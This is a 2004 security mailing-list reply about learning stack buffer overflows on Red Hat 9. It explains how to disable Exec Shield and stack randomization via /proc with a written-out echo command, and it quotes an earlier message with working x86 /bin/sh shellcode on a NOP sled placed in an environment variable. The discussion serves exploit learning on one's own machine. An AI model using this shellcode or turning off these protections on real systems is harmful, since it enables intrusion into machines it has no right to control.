Re: Buffer Overflow Help

From: runixd (runixd_at_nullcode.net)
Date: 11/10/04

  • Next message: Carlos Carvalho: "RE: Buffer Overflow Help"
    To: vuln-dev@securityfocus.com
    Date: Wed, 10 Nov 2004 16:08:43 +0000
    
    

    On Wed, 2004-11-10 at 12:01 +0200, Harry de Grote wrote:
    > Op Tuesday 09 November 2004 04:09, eip@tampabay.rr.com sgreifde:
    > <snip>
    > > I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
    > > 9 box kernel 2.4.20-31.9. Am I doing something wrong?
    >
    > no, you don't
    >
    > but... RH does randomize the stack a little iirc

    > so, my way of doing stuff then, is just brute force it! :)
    > (you could also return tu libc or whatever)

    How would returning to libc help with randomized stack?

    Brute forcing should help, but while learning its probably better to run
    vanilla kernel or disable Exec Shield. Depending on your version,
    options may very, but you should be able to disable stack randomization
    by setting
    /proc/sys/kernel/exec-shield-randomize to 0
    "echo 0 > /proc/sys/kernel/exec-shield-randomize"

    and you can disable exec shield in /proc/sys/kernel/exec-shield, setting
    it to 0, should cause it to be disabled, otherwise this is where you
    have to work with non executable stack and return to libc.

    You can start reading about Exec Shield at
    http://people.redhat.com/mingo/exec-shield/ANNOUNCE-exec-shield

    > best way to do it (i think) is : put your shellcode in the env...
    >
    > export SHELLCODE=`perl -e '{print "\x90"x65000 .
    > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`
    >
    > that should give you some breathing space for where to jump to...
    >
    > shellcode starts (on my box at 0xbfff0027, so everything from there to
    > 0xbffffe00 sould do fine...

    regards


  • Next message: Carlos Carvalho: "RE: Buffer Overflow Help"